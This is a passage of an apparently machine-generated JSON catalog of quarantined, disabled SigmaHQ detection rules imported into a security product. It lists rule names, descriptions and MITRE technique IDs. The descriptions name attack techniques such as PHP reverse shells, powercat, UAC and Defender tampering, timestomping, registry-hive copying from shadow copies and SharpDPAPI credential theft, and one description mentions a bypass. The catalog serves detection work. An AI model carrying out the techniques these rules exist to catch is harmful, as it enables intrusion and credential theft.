"T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netcat-the-powershell-version.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5b20776-639a-49bf-94c7-84f912b91c15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" } }, { "id": "sigmahq-sigma-c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "type": "detection", "name": "Suspicious Schtasks Execution AppData Folder", "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-execution-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" } }, { "id": "sigmahq-sigma-c5cd1b20-36bb-488d-8c05-486be3d0cb97", "type": "detection", "name": "Privileged Container Deployed", "description": "Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor 
mounting a container breakout attacks.\nA privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\nVarious versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-container-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5cd1b20-36bb-488d-8c05-486be3d0cb97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml" } }, { "id": "sigmahq-sigma-c5f6a85d-b647-40f7-bbad-c10b66bab038", "type": "detection", "name": "UAC Notification Disabled", "description": "Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\nUAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. 
It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\nWhen \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-notification-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5f6a85d-b647-40f7-bbad-c10b66bab038", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml" } }, { "id": "sigmahq-sigma-c615d676-f655-46b9-b913-78729021e5d7", "type": "detection", "name": "Data Export From MSSQL Table Via BCP.EXE", "description": "Detects the execution of the BCP utility in order to export data from the database.\nAttackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-export-from-mssql-table-via-bcp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c615d676-f655-46b9-b913-78729021e5d7", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bcp_export_data.yml" } }, { "id": "sigmahq-sigma-c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "type": "detection", "name": "Uncommon File Creation By Mysql Daemon Process", "description": "Detects the creation of files with scripting or executable extensions by Mysql daemon.\nWhich could be an indicator of \"User Defined Functions\" abuse to download malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-creation-by-mysql-daemon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml" } }, { "id": "sigmahq-sigma-c625d754-6a3d-4f65-9c9a-536aea960d37", "type": "detection", "name": "Permission Check Via Accesschk.EXE", "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/permission-check-via-accesschk-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c625d754-6a3d-4f65-9c9a-536aea960d37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" } }, { "id": "sigmahq-sigma-c633622e-cab9-4eaa-bb13-66a1d68b3e47", "type": "detection", "name": "New Virtual Smart Card Created Via TpmVscMgr.EXE", "description": "Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-virtual-smart-card-created-via-tpmvscmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c633622e-cab9-4eaa-bb13-66a1d68b3e47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml" } }, { "id": "sigmahq-sigma-c6438007-e081-42ce-9483-b067fbef33c3", "type": "detection", "name": "Powershell Timestomp", "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same 
folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-timestomp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6438007-e081-42ce-9483-b067fbef33c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" } }, { "id": "sigmahq-sigma-c649a6c7-cd8c-4a78-9c04-000fc76df954", "type": "detection", "name": "Potentially Suspicious Wuauclt Network Connection", "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-wuauclt-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" } }, { "id": "sigmahq-sigma-c64c5175-5189-431b-a55e-6d9882158251", "type": "detection", "name": "Telegram Bot API Request", "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/telegram-bot-api-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c64c5175-5189-431b-a55e-6d9882158251", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_telegram_api.yml" } }, { "id": "sigmahq-sigma-c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "type": "detection", "name": "Potential PHP Reverse Shell", "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. 
The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-php-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml" } }, { "id": "sigmahq-sigma-c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "type": "detection", "name": "Shellshock Expression", "description": "Detects shellshock expressions in log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shellshock-expression.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shellshock.yml" } }, { "id": 
"sigmahq-sigma-c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "type": "detection", "name": "Symlink Etc Passwd", "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/symlink-etc-passwd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_symlink_etc_passwd.yml" } }, { "id": "sigmahq-sigma-c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "type": "detection", "name": "Audit Policy Tampering Via NT Resource Kit Auditpol", "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-policy-tampering-via-nt-resource-kit-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml" } }, { "id": "sigmahq-sigma-c6fb44c6-71f5-49e6-9462-1425d328aee3", "type": "detection", "name": "Powershell Base64 Encoded MpPreference Cmdlet", "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-mppreference-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6fb44c6-71f5-49e6-9462-1425d328aee3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" } }, { "id": "sigmahq-sigma-c70e019b-1479-4b65-b0cc-cd0c6093a599", "type": "detection", "name": "PowerShell Called from an Executable Version Mismatch", "description": "Detects PowerShell called from an executable by the version mismatch method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/powershell-called-from-an-executable-version-mismatch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" } }, { "id": "sigmahq-sigma-c72aca44-8d52-45ad-8f81-f96c4d3c755e", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - PowerShell Module", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-c73124a7-3e89-44a3-bdc1-25fe4df754b1", "type": "detection", "name": "Copy From VolumeShadowCopy Via Cmd.EXE", "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-from-volumeshadowcopy-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" } }, { "id": "sigmahq-sigma-c740d4cf-a1e9-41de-bb16-8a46a4f57918", "type": "detection", "name": "Potential Suspicious Windows Feature Enabled - ProcCreation", "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-windows-feature-enabled-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-c74c0390-3e20-41fd-a69a-128f0275a5ea", "type": "detection", "name": "Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths", "description": "Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cab-file-extraction-via-wusa-exe-from-potentially-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" } }, { "id": "sigmahq-sigma-c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "type": "detection", "name": "Run Once Task Configuration in Registry", "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-once-task-configuration-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" } }, { "id": "sigmahq-sigma-c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "type": "detection", "name": "Kernel Memory Dump Via LiveKD", "description": "Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kernel-memory-dump-via-livekd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" } }, { "id": "sigmahq-sigma-c7942406-33dd-4377-a564-0f62db0593a3", 
"type": "detection", "name": "Suspicious CodePage Switch Via CHCP", "description": "Detects a code page switch in command line or batch scripts to a rare language", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-codepage-switch-via-chcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7942406-33dd-4377-a564-0f62db0593a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml" } }, { "id": "sigmahq-sigma-c79da740-5030-45ec-a2e0-479e824a562c", "type": "detection", "name": "System Disk And Volume Reconnaissance Via Wmic.EXE", "description": "An adversary might use WMI to discover information about the system, such as the volume name, size,\nfree space, and other disk information. 
This can be done using the 'wmic' command-line utility and has been\nobserved being used by threat actors such as Volt Typhoon.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-disk-and-volume-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c79da740-5030-45ec-a2e0-479e824a562c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml" } }, { "id": "sigmahq-sigma-c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "type": "detection", "name": "File With Uncommon Extension Created By An Office Application", "description": "Detects the creation of files with an executable or script extension by an Office application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-with-uncommon-extension-created-by-an-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml" } }, { "id": "sigmahq-sigma-c7c8aa1c-5aff-408e-828b-998e3620b341", "type": "detection", "name": "MSI Installation From Suspicious Locations", "description": "Detects MSI package installation from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msi-installation-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml" } }, { "id": "sigmahq-sigma-c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "type": "detection", "name": "Failed MSExchange Transport Agent Installation", "description": "Detects a failed installation of a Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-msexchange-transport-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" } }, { "id": "sigmahq-sigma-c7d33b50-f690-4b51-8cfb-0fb912a31e57", "type": "detection", "name": "HackTool - SharpDPAPI Execution", "description": "Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\nSharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpdpapi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7d33b50-f690-4b51-8cfb-0fb912a31e57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml" } }, { "id": "sigmahq-sigma-c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "type": "detection", "name": "PUA - Sysinternals Tools Execution - Registry", "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. 
